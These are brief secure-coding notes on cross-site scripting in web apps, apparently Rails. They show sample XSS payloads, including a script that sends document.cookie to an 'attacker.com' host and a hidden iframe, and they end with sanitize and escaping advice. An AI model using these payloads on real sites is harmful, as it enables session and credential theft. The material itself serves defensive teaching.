User injects client side executable code. User can add js-malicious code within user input boxes, parameters or cookies
this
<script>alert('Hello');</script>
is the same as this
<img src=javascript:alert('Hello')>
<table background="javascript:alert('Hello')">document.cookie holds the cookie of the originating web server document.cookie can be read and written by js
this will send your cookie to the attacker site
<script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>Example → Present false information to the victim to steal the cookie, login credentials or other sensitive data.
<iframe name="StatPage" src="http://58.xx.xxx.xxx" width=5 height=5 style="display:none"></iframe>Filter Input and Escape Output
tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p)
s = sanitize(user_input, tags: tags, attributes: %w(href title))Use escapeHTML() (or its alias h()) method to replace the HTML input characters &, ", <, and > by their uninterpreted representations in HTML (&, ", <, and >). However, it can easily happen that the programmer forgets to use it, so _it is recommended to use the SafeErb gem. SafeErb reminds you to escape strings from external sources.